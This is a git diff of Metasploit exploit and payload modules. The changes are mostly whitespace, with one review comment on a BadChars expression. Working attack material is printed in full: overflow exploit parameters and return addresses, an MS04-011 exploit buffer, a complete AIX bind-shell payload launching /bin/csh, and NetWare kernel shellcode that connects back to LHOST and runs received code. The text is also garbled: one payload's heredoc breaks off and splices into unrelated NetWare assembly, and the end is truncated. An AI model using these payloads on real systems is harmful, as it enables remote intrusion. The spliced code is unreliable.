a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb index 31aaf09e3b..0b54bc8ea7 100644 --- a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb +++ b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Version' => '$Revision$', 'References' => [ - [ 'CVE', '2006-1255' ], + [ 'CVE', '2006-1255' ], [ 'OSVDB', '23950' ], [ 'BID', '17138' ], ], 
diff --git a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb index 866c8c0624..d99a251961 100644 --- a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb +++ b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb @@ -41,14 +41,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Payload' => { 'Space' => 1024, - 'BadChars' => "\x00\x09\x0a\x0b\x0d\x20\x22\x23\x25\x26\x27\x2b\x2f\x3a\x3b\x3c" + - "\x3d\x3e\x3f\x40\x5c" + "Zz", + 'BadChars' => "\x00\x09\x0a\x0b\x0d\x20\x22\x23\x25\x26\x27\x2b\x2f" + + (0x3a..0x3f).to_a.pack('C*') + "\x40\x5c" + "Zz", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ - # Version-specific return addresses + # Version-specific return addresses ['RSA WebAgent 5.2', { 'Rets' => [ 996, 0x1001e694 ] }], ['RSA WebAgent 5.3', { 'Rets' => [ 992, 0x10010e89 ] }], diff --git a/modules/exploits/windows/license/calicclnt_getconfig.rb b/modules/exploits/windows/license/calicclnt_getconfig.rb index 31a9f036f4..8a69fcfece 100644 --- a/modules/exploits/windows/license/calicclnt_getconfig.rb +++ b/modules/exploits/windows/license/calicclnt_getconfig.rb @@ -31,10 +31,11 @@ class Metasploit3 < Msf::Exploit::Remote to the agent port before it starts ignoring you. If it wasn't for this issue, it would be possible to repeatedly exploit this bug. }, - 'Author' => [ + 'Author' => + [ 'Thor Doomen ', # original msf v2 module 'patrick', # msf v3 port :) - ], + ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => diff --git a/modules/exploits/windows/license/calicserv_getconfig.rb b/modules/exploits/windows/license/calicserv_getconfig.rb index dde0d21d08..59d95b1692 100644 --- a/modules/exploits/windows/license/calicserv_getconfig.rb +++ b/modules/exploits/windows/license/calicserv_getconfig.rb 
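Review bot: The new `'BadChars'` expression in rsa_webagent_redirect.rb is equivalent to the old literal (`(0x3a..0x3f)` produces exactly `\x3a`..`\x3f`), but spreading one set of URL-significant bytes across a string literal, a computed range and the trailing `"Zz"` is harder to audit than the flat string it replaces, and six bytes gain nothing from a range. Either keep the explicit form or label the range, e.g. `(0x3a..0x3f).to_a.pack('C*') + # ':' ';' '<' '=' '>' '?'`, so the reader does not have to decode it. The `"Zz"` exclusion is unexplained in both versions; if it is known why those two letters break the redirect handler, a one-line comment would be worth adding. The enclosing `update_info` call starts before the hunk.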
@@ -24,10 +24,11 @@ class Metasploit3 < Msf::Exploit::Remote network service. By sending an excessively long GETCONFIG packet the stack may be overwritten. }, - 'Author' => [ + 'Author' => + [ 'Thor Doomen ', # original msf v2 module 'patrick', # msf v3 port :) - ], + ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => diff --git a/modules/exploits/windows/lpd/hummingbird_exceed.rb b/modules/exploits/windows/lpd/hummingbird_exceed.rb index 3d0a4ae036..e23baeaaff 100644 --- a/modules/exploits/windows/lpd/hummingbird_exceed.rb +++ b/modules/exploits/windows/lpd/hummingbird_exceed.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ ['CVE', '2005-1815'], - ['OSVDB', '16957'], + ['OSVDB', '16957'], ['BID', '13788'], ], 'Privileged' => true, diff --git a/modules/exploits/windows/lpd/niprint.rb b/modules/exploits/windows/lpd/niprint.rb index 64820de40a..c707d6ff7c 100644 --- a/modules/exploits/windows/lpd/niprint.rb +++ b/modules/exploits/windows/lpd/niprint.rb @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ ['CVE', '2003-1141'], - ['OSVDB', '2774'], + ['OSVDB', '2774'], ['BID', '8968'], ['URL', 'http://www.immunitysec.com/documentation/vs_niprint.html'], ], diff --git a/modules/exploits/windows/misc/bakbone_netvault_heap.rb b/modules/exploits/windows/misc/bakbone_netvault_heap.rb index 92ed926f7c..763f5c3cc7 100644 --- a/modules/exploits/windows/misc/bakbone_netvault_heap.rb +++ b/modules/exploits/windows/misc/bakbone_netvault_heap.rb @@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 1024, 'BadChars' => "\x00\x20", - 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", + 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', 'Targets' => diff --git a/modules/exploits/windows/misc/eiqnetworks_esa.rb b/modules/exploits/windows/misc/eiqnetworks_esa.rb index 720379aa65..6858f4c50f 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa.rb 
+++ b/modules/exploits/windows/misc/eiqnetworks_esa.rb @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 400, 'BadChars' => "\x00", - 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", + 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', 'Targets' => diff --git a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb index e97e472f3c..fd26ef5233 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 250, 'BadChars' => "\x00\x0a\x0d\x20", - 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", + 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', 'Targets' => diff --git a/modules/exploits/windows/misc/hp_omniinet_1.rb b/modules/exploits/windows/misc/hp_omniinet_1.rb index 375b441f44..72cbe492e3 100644 --- a/modules/exploits/windows/misc/hp_omniinet_1.rb +++ b/modules/exploits/windows/misc/hp_omniinet_1.rb @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote NOTE: There are actually two consecutive wcscpy() calls in the program (which may be why ZDI considered them two separate issues). However, this module only - exploits the first one. + exploits the first one. }, 'Author' => [ diff --git a/modules/exploits/windows/misc/hp_omniinet_2.rb b/modules/exploits/windows/misc/hp_omniinet_2.rb index 84eb40a594..078736e931 100644 --- a/modules/exploits/windows/misc/hp_omniinet_2.rb +++ b/modules/exploits/windows/misc/hp_omniinet_2.rb @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote NOTE: There are actually two consecutive wcscpy() calls in the program (which may be why ZDI considered them two separate issues). However, this module only - exploits the second one. + exploits the second one. }, 'Author' => [ 
diff --git a/modules/exploits/windows/misc/tiny_identd_overflow.rb b/modules/exploits/windows/misc/tiny_identd_overflow.rb index 768d356d49..e73a6498bc 100644 --- a/modules/exploits/windows/misc/tiny_identd_overflow.rb +++ b/modules/exploits/windows/misc/tiny_identd_overflow.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Version' => '$Revision$', 'References' => [ - ['CVE', '2007-2711'], + ['CVE', '2007-2711'], ['OSVDB', '36053'], ['BID', '23981'], ], diff --git a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb index 64028e36e4..9c1a335627 100644 --- a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb +++ b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Dec 08 2005' )) end - + # Do not automatically run this module, it can lead to lockouts with SQL Server 2005 def autofilter false diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb index c913d6d863..e8be78f7c3 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb 
@@ -36,13 +36,13 @@ class Metasploit3 < Msf::Exploit::Remote 1. pointer to a 32-bit value that is set to 0 2. pointer to a 32-bit value that is set to a length influcenced by the buffer - length. + length. 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000, - this value is referenced with a displacement of 0x38. For MSSQL 2005, the - displacement is 0x10. The address of our buffer is conveniently stored in - ecx when this instruction is executed. + this value is referenced with a displacement of 0x38. For MSSQL 2005, the + displacement is 0x10. The address of our buffer is conveniently stored in + ecx when this instruction is executed. 4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with - a displacement of 4. This pointer is not used by this exploit. + a displacement of 4. This pointer is not used by this exploit. This particular exploit replaces the previous dual-method exploit. It uses a technique where the value contained in ecx becomes the stack. From there, diff --git a/modules/exploits/windows/proxy/proxypro_http_get.rb b/modules/exploits/windows/proxy/proxypro_http_get.rb index ce730f746a..75e6748f4e 100644 --- a/modules/exploits/windows/proxy/proxypro_http_get.rb +++ b/modules/exploits/windows/proxy/proxypro_http_get.rb @@ -20,8 +20,8 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow', 'Description' => %q{ - This module exploits a stack buffer overflow in Proxy-Pro Professional - GateKeeper 4.7. By sending a long HTTP GET to the default port + This module exploits a stack buffer overflow in Proxy-Pro Professional + GateKeeper 4.7. By sending a long HTTP GET to the default port of 3128, a remote attacker could overflow a buffer and execute arbitrary code. }, diff --git a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb index 43e9631b3b..700370fa27 100644 
--- a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb +++ b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Qbik WinGate WWW Proxy Server URL Processing Overflow', 'Description' => %q{ - This module exploits a stack buffer overflow in Qbik WinGate version + This module exploits a stack buffer overflow in Qbik WinGate version 6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the HTTP proxy service on port 80, a remote attacker could overflow a buffer and execute arbitrary code. diff --git a/modules/exploits/windows/smb/ms06_040_netapi.rb b/modules/exploits/windows/smb/ms06_040_netapi.rb index 59f28e18b8..094d4e5503 100644 --- a/modules/exploits/windows/smb/ms06_040_netapi.rb +++ b/modules/exploits/windows/smb/ms06_040_netapi.rb @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Privileged' => true, 'Payload' => { - # Technically we can use more space than this, but by limiting it + # Technically we can use more space than this, but by limiting it # to 370 bytes we can use the same request for all Windows SPs. 'Space' => 370, 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e", @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'Targets' => [ - [ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)', { } ], + [ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)', { } ], [ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4', { 'Offset' => 1000, diff --git a/modules/exploits/windows/ssl/ms04_011_pct.rb b/modules/exploits/windows/ssl/ms04_011_pct.rb index f7fe72a825..c03f2e2af4 100644 --- a/modules/exploits/windows/ssl/ms04_011_pct.rb +++ b/modules/exploits/windows/ssl/ms04_011_pct.rb 
@@ -133,9 +133,9 @@ class Metasploit3 < Msf::Exploit::Remote # eb0f => jmp short 11 to shellcode buf = "\x80\x66\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x86\x01\x00\x00\x00"+ - "\xeb\x0f" + 'XXXXXXXXXXX' + - [target.ret ^ 0xffffffff].pack('V')+ - payload.encoded + "\xeb\x0f" + 'XXXXXXXXXXX' + + [target.ret ^ 0xffffffff].pack('V')+ + payload.encoded # Connect to a SMTP service, call STARTTLS if (datastore['PROTO'] == 'smtp') diff --git a/modules/exploits/windows/tftp/tftpd32_long_filename.rb b/modules/exploits/windows/tftp/tftpd32_long_filename.rb index 2570f15159..999e28b29f 100644 --- a/modules/exploits/windows/tftp/tftpd32_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpd32_long_filename.rb @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Version' => '$Revision$', 'References' => [ - ['CVE', '2002-2226'], + ['CVE', '2002-2226'], ['OSVDB', '45903'], ['BID', '6199'], ], diff --git a/modules/exploits/windows/unicenter/cam_log_security.rb b/modules/exploits/windows/unicenter/cam_log_security.rb index 989accd484..b26fa78550 100644 --- a/modules/exploits/windows/unicenter/cam_log_security.rb +++ b/modules/exploits/windows/unicenter/cam_log_security.rb @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Targets' => [ - # W2API.DLL @ 0x01950000 - return to ESI + # W2API.DLL @ 0x01950000 - return to ESI ['W2API.DLL TNG 2.3', { 'Platform' => 'win', 'Ret' => 0x01951107 }], # Return to ESI in ws2help.dll diff --git a/modules/exploits/windows/wins/ms04_045_wins.rb b/modules/exploits/windows/wins/ms04_045_wins.rb index a8a259db85..d5da8336dd 100644 --- a/modules/exploits/windows/wins/ms04_045_wins.rb +++ b/modules/exploits/windows/wins/ms04_045_wins.rb @@ -192,7 +192,7 @@ class Metasploit3 < Msf::Exploit::Remote # Determine if the patch has already been applied req = "\x00\x00\x00\x0F\x00\x00\x78\x00" + data[16, 4] + - "\x00\x00\x00\x03\x00\x00\x00\x00" + "\x00\x00\x00\x03\x00\x00\x00\x00" sock.put(req) data = sock.get_once 
diff --git a/modules/nops/sparc/random.rb b/modules/nops/sparc/random.rb index 023c7f6680..75e5401498 100644 --- a/modules/nops/sparc/random.rb +++ b/modules/nops/sparc/random.rb @@ -157,7 +157,7 @@ class Metasploit3 < Msf::Nop end def ins_sethi(ref, len=0) - [(get_dst_reg() << 25) | (4 << 22) | rand(1 << 22)].pack('N') + [(get_dst_reg() << 25) | (4 << 22) | rand(1 << 22)].pack('N') end def ins_arithmetic(ref, len=0) diff --git a/modules/nops/x86/single_byte.rb b/modules/nops/x86/single_byte.rb index 3b42a5ba50..2a4d9f4963 100644 --- a/modules/nops/x86/single_byte.rb +++ b/modules/nops/x86/single_byte.rb @@ -136,8 +136,8 @@ SINGLE_BYTE_SLED = end end while ((badchars.include?(cur_char)) or - ((sled_hash[cur_char]) and - ((sled_hash[cur_char] & badregs).length > 0))) + ((sled_hash[cur_char]) and + ((sled_hash[cur_char] & badregs).length > 0))) # Add the character to the sled now that it's passed our checks out_sled += cur_char diff --git a/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb b/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb index 45b0b0169b..a33f844864 100644 --- a/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb @@ -38,7 +38,7 @@ module Metasploit3 'LPORT' => [ 82, 'n' ], }, } - )) + )) end 
@@ -46,79 +46,79 @@ module Metasploit3 super(*args) payload = - "\x7f\xff\xfa\x79" +# xor. r31,r31,r31 # - "\x40\x82\xff\xfd" +# bnel # - "\x7f\xc8\x02\xa6" +# mflr r30 # - "\x3b\xde\x01\xff" +# cal r30,511(r30) # - "\x3b\xde\xfe\x1d" +# cal r30,-483(r30) # - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x20" +# bctr # - "\x4c\xc6\x33\x42" +# crorc 6,6,6 # - "\x44\xff\xff\x02" +# svca 0 # - "\x3b\xde\xff\xf8" +# cal r30,-8(r30) # - "\x3b\xa0\x07\xff" +# lil r29,2047 # - "\x7c\xa5\x2a\x78" +# xor r5,r5,r5 # - "\x38\x9d\xf8\x02" +# cal r4,-2046(r29) # - "\x38\x7d\xf8\x03" +# cal r3,-2045(r29) # - @cal_socket + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7c\x7c\x1b\x78" +# mr r28,r3 # - "\x38\xbd\xf8\x11" +# cal r5,-2031(r29) # - "\x3f\x60\xff\x02" +# liu r27,-254 # - "\x63\x7b\x11\x5c" +# oril r27,r27,4444 # - "\x97\xe1\xff\xfc" +# stu r31,-4(r1) # - "\x97\x61\xff\xfc" +# stu r27,-4(r1) # - "\x7c\x24\x0b\x78" +# mr r4,r1 # - @cal_bind + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7c\x84\x22\x78" +# xor r4,r4,r4 # - "\x7f\x83\xe3\x78" +# mr r3,r28 # - @cal_listen + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7c\xa5\x2a\x78" +# xor r5,r5,r5 # - "\x7c\x84\x22\x78" +# xor r4,r4,r4 # - "\x7f\x83\xe3\x78" +# mr r3,r28 # - @cal_accept + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7c\x7a\x1b\x78" +# mr r26,r3 # - "\x3b\x3d\xf8\x03" +# cal r25,-2045(r29) # - "\x7f\x23\xcb\x78" +# mr r3,r25 # - @cal_close + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7f\x25\xcb\x78" +# mr r5,r25 # - "\x7c\x84\x22\x78" +# xor r4,r4,r4 # - "\x7f\x43\xd3\x78" +# mr r3,r26 # - @cal_kfcntl + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x37\x39\xff\xff" +# ai. r25,r25,-1 # - "\x40\x80\xff\xd4" +# bge # - "\x7c\xa5\x2a\x79" +# xor. 
r5,r5,r5 # - "\x40\x82\xff\xfd" +# bnel # - "\x7f\x08\x02\xa6" +# mflr r24 # - "\x3b\x18\x01\xff" +# cal r24,511(r24) # - "\x38\x78\xfe\x29" +# cal r3,-471(r24) # - "\x98\xb8\xfe\x31" +# stb r5,-463(r24) # - "\x94\xa1\xff\xfc" +# stu r5,-4(r1) # - "\x94\x61\xff\xfc" +# stu r3,-4(r1) # - "\x7c\x24\x0b\x78" +# mr r4,r1 # - @cal_execve + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "/bin/csh" + "\x7f\xff\xfa\x79" +# xor. r31,r31,r31 # + "\x40\x82\xff\xfd" +# bnel # + "\x7f\xc8\x02\xa6" +# mflr r30 # + "\x3b\xde\x01\xff" +# cal r30,511(r30) # + "\x3b\xde\xfe\x1d" +# cal r30,-483(r30) # + "\x7f\xc9\x03\xa6" +# mtctr r30 # + "\x4e\x80\x04\x20" +# bctr # + "\x4c\xc6\x33\x42" +# crorc 6,6,6 # + "\x44\xff\xff\x02" +# svca 0 # + "\x3b\xde\xff\xf8" +# cal r30,-8(r30) # + "\x3b\xa0\x07\xff" +# lil r29,2047 # + "\x7c\xa5\x2a\x78" +# xor r5,r5,r5 # + "\x38\x9d\xf8\x02" +# cal r4,-2046(r29) # + "\x38\x7d\xf8\x03" +# cal r3,-2045(r29) # + @cal_socket + + "\x7f\xc9\x03\xa6" +# mtctr r30 # + "\x4e\x80\x04\x21" +# bctrl # + "\x7c\x7c\x1b\x78" +# mr r28,r3 # + "\x38\xbd\xf8\x11" +# cal r5,-2031(r29) # + "\x3f\x60\xff\x02" +# liu r27,-254 # + "\x63\x7b\x11\x5c" +# oril r27,r27,4444 # + "\x97\xe1\xff\xfc" +# stu r31,-4(r1) # + "\x97\x61\xff\xfc" +# stu r27,-4(r1) # + "\x7c\x24\x0b\x78" +# mr r4,r1 # + @cal_bind + + "\x7f\xc9\x03\xa6" +# mtctr r30 # + "\x4e\x80\x04\x21" +# bctrl # + "\x7c\x84\x22\x78" +# xor r4,r4,r4 # + "\x7f\x83\xe3\x78" +# mr r3,r28 # + @cal_listen + + "\x7f\xc9\x03\xa6" +# mtctr r30 # + "\x4e\x80\x04\x21" +# bctrl # + "\x7c\xa5\x2a\x78" +# xor r5,r5,r5 # + "\x7c\x84\x22\x78" +# xor r4,r4,r4 # + "\x7f\x83\xe3\x78" +# mr r3,r28 # + @cal_accept + + "\x7f\xc9\x03\xa6" +# mtctr r30 # + "\x4e\x80\x04\x21" +# bctrl # + "\x7c\x7a\x1b\x78" +# mr r26,r3 # + "\x3b\x3d\xf8\x03" +# cal r25,-2045(r29) # + "\x7f\x23\xcb\x78" +# mr r3,r25 # + @cal_close + + "\x7f\xc9\x03\xa6" +# mtctr r30 # + "\x4e\x80\x04\x21" +# bctrl # + "\x7f\x25\xcb\x78" +# mr r5,r25 # 
+ "\x7c\x84\x22\x78" +# xor r4,r4,r4 # + "\x7f\x43\xd3\x78" +# mr r3,r26 # + @cal_kfcntl + + "\x7f\xc9\x03\xa6" +# mtctr r30 # + "\x4e\x80\x04\x21" +# bctrl # + "\x37\x39\xff\xff" +# ai. r25,r25,-1 # + "\x40\x80\xff\xd4" +# bge # + "\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 # + "\x40\x82\xff\xfd" +# bnel # + "\x7f\x08\x02\xa6" +# mflr r24 # + "\x3b\x18\x01\xff" +# cal r24,511(r24) # + "\x38\x78\xfe\x29" +# cal r3,-471(r24) # + "\x98\xb8\xfe\x31" +# stb r5,-463(r24) # + "\x94\xa1\xff\xfc" +# stu r5,-4(r1) # + "\x94\x61\xff\xfc" +# stu r3,-4(r1) # + "\x7c\x24\x0b\x78" +# mr r4,r1 # + @cal_execve + + "\x7f\xc9\x03\xa6" +# mtctr r30 # + "\x4e\x80\x04\x21" +# bctrl # + "/bin/csh" - # If the payload is generated and there are offsets to substitute, - # do that now. - if (payload and offsets) - substitute_vars(payload, offsets) - end + # If the payload is generated and there are offsets to substitute, + # do that now. + if (payload and offsets) + substitute_vars(payload, offsets) + end - payload + payload end end diff --git a/modules/payloads/singles/aix/ppc/shell_interact.rb b/modules/payloads/singles/aix/ppc/shell_interact.rb index 6903ad3fd1..e41b66deee 100644 --- a/modules/payloads/singles/aix/ppc/shell_interact.rb +++ b/modules/payloads/singles/aix/ppc/shell_interact.rb @@ -32,7 +32,7 @@ module Metasploit3 'PayloadType' => 'cmd_interact', 'Handler' => Msf::Handler::FindShell, 'Session' => Msf::Sessions::CommandShell - )) + )) end 
@@ -40,20 +40,20 @@ module Metasploit3 super(*args) payload = - "\x7c\xa5\x2a\x79" +# /* xor. r5,r5,r5 */ - "\x40\x82\xff\xfd" +# /* bnel */ - "\x7f\xe8\x02\xa6" +# /* mflr r31 */ - "\x3b\xff\x01\x20" +# /* cal r31,0x120(r31) */ - "\x38\x7f\xff\x08" +# /* cal r3,-248(r31) */ - "\x38\x9f\xff\x10" +# /* cal r4,-240(r31) */ - "\x90\x7f\xff\x10" +# /* st r3,-240(r31) */ - "\x90\xbf\xff\x14" +# /* st r5,-236(r31) */ - "\x88\x5f\xff\x0f" +# /* lbz r2,-241(r31) */ - "\x98\xbf\xff\x0f" +# /* stb r5,-241(r31) */ - "\x4c\xc6\x33\x42" +# /* crorc cr6,cr6,cr6 */ - "\x44\xff\xff\x02" +# /* svca */ - "/bin/sh"+ - "\x05" + "\x7c\xa5\x2a\x79" +# /* xor. r5,r5,r5 */ + "\x40\x82\xff\xfd" +# /* bnel */ + "\x7f\xe8\x02\xa6" +# /* mflr r31 */ + "\x3b\xff\x01\x20" +# /* cal r31,0x120(r31) */ + "\x38\x7f\xff\x08" +# /* cal r3,-248(r31) */ + "\x38\x9f\xff\x10" +# /* cal r4,-240(r31) */ + "\x90\x7f\xff\x10" +# /* st r3,-240(r31) */ + "\x90\xbf\xff\x14" +# /* st r5,-236(r31) */ + "\x88\x5f\xff\x0f" +# /* lbz r2,-241(r31) */ + "\x98\xbf\xff\x0f" +# /* stb r5,-241(r31) */ + "\x4c\xc6\x33\x42" +# /* crorc cr6,cr6,cr6 */ + "\x44\xff\xff\x02" +# /* svca */ + "/bin/sh"+ + "\x05" end diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb index af10f10e98..b2b302fd80 100644 --- a/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb +++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb 
@@ -45,49 +45,49 @@ module Metasploit3 'LPORT' => [ 0, 'n' ], }, 'Assembly' => < points inside SERVER.NLM - cli - sub esp, 8 - mov ecx, esp - sgdt [ecx] + // search DebuggerSymbolHashTable pointer using GDT system call gate + // -> points inside SERVER.NLM + cli + sub esp, 8 + mov ecx, esp + sgdt [ecx] - cli - mov ebx, [ecx+2] + cli + mov ebx, [ecx+2] - mov bp, word ptr [ebx+0x4E] - shl ebp, 16 - mov bp, word ptr [ebx+0x48] + mov bp, word ptr [ebx+0x4E] + shl ebp, 16 + mov bp, word ptr [ebx+0x48] f_finddebugger: - cmp dword ptr[ebp], 0 - jnz f_next - cmp dword ptr[ebp+4], 0x808bc201 - jz f_end + cmp dword ptr[ebp], 0 + jnz f_next + cmp dword ptr[ebp+4], 0x808bc201 + jz f_end f_next: - dec ebp - jmp f_finddebugger + dec ebp + jmp f_finddebugger f_end: - mov ebp, [ebp-7] + mov ebp, [ebp-7] - // resolve function pointers - call current + // resolve function pointers + call current current: - pop edi - add edi, (fct_ptrs - current) - mov cl, 6 + pop edi + add edi, (fct_ptrs - current) + mov cl, 6 resolv_ptrs: - push [edi] - call resolv_addr - stosd - dec cl - test cl, cl - jnz resolv_ptrs + push [edi] + call resolv_addr + stosd + dec cl + test cl, cl + jnz resolv_ptrs - sti + sti - // remove CIFS lock - call [edi-4] // NSS.NLM|NSSMPK_UnlockNss + // remove CIFS lock + call [edi-4] // NSS.NLM|NSSMPK_UnlockNss - // allocate heap buffer to remove the code from the stack (if on the stack) - // network functions will give back control to the kernel and we don't want - // the driver to erase our shellcode + // allocate heap buffer to remove the code from the stack (if on the stack) + // network functions will give back control to the kernel and we don't want + // the driver to erase our shellcode - push 65535 - call [edi-8] ; AFPTCP.NLM|LB_malloc - mov ecx, (end_reverse - reverse_connect) - mov esi, edi - sub esi, ecx - mov edi, eax - test eax, eax - jz end + push 65535 + call [edi-8] ; AFPTCP.NLM|LB_malloc + mov ecx, (end_reverse - reverse_connect) + mov esi, edi + sub esi, 
ecx + mov edi, eax + test eax, eax + jz end - repe movsb - jmp eax + repe movsb + jmp eax reverse_connect: - xor ebx, ebx - - push ebp - mov ebp, esp - push ebp - push ebx // protocol - push 1 // SOCK_STREAM - push 2 // AF_INET - call [edi-0xc] // LIBC.NLM|bsd_socket_mp - mov esi, eax - test eax, eax - jz end - - push ebx - push ebx - push LHOST - push.i16 LPORT - push.i16 2 - mov ecx, esp - push ebp - push 16 - push ecx - push esi - call [edi-0x10] // LIBC.NLM|bsd_connect_mp - cmp eax, -1 - jz end - - push 65535 - push edi - mov ecx, esp - - push ebx - push ebx - push ebx - inc ebx - push ebx - dec ebx - push ecx - push ebx - push ebx - mov ecx, esp - - push ebp - push ebx - push ecx - push esi - call [edi-0x14] // LIBC.NLM|bsd_recvmsg_mp - - jmp edi + xor ebx, ebx + + push ebp + mov ebp, esp + push ebp + push ebx // protocol + push 1 // SOCK_STREAM + push 2 // AF_INET + call [edi-0xc] // LIBC.NLM|bsd_socket_mp + mov esi, eax + test eax, eax + jz end + + push ebx + push ebx + push LHOST + push.i16 LPORT + push.i16 2 + mov ecx, esp + push ebp + push 16 + push ecx + push esi + call [edi-0x10] // LIBC.NLM|bsd_connect_mp + cmp eax, -1 + jz end + + push 65535 + push edi + mov ecx, esp + + push ebx + push ebx + push ebx + inc ebx + push ebx + dec ebx + push ecx + push ebx + push ebx + mov ecx, esp + + push ebp + push ebx + push ecx + push esi + call [edi-0x14] // LIBC.NLM|bsd_recvmsg_mp + + jmp edi end: - ; go back to the main kernel loop - call [edi-0x18] // SERVER.NLM|kWorkerThread + ; go back to the main kernel loop + call [edi-0x18] // SERVER.NLM|kWorkerThread fct_ptrs: - dd 0x9294bdcb // SERVER.NLM|kWorkerThread - dd 0x3605cc1c // LIBC.NLM|bsd_recvmsg_mp - dd 0x19a75280 // LIBC.NLM|bsd_connect_mp - dd 0x46f23d88 // LIBC.NLM|bsd_socket_mp - dd 0x6877687c // AFPTCP.NLM|LB_malloc - dd 0x8967f0ce // NSS.NLM|NSSMPK_UnlockNss + dd 0x9294bdcb // SERVER.NLM|kWorkerThread + dd 0x3605cc1c // LIBC.NLM|bsd_recvmsg_mp + dd 0x19a75280 // LIBC.NLM|bsd_connect_mp + dd 0x46f23d88 
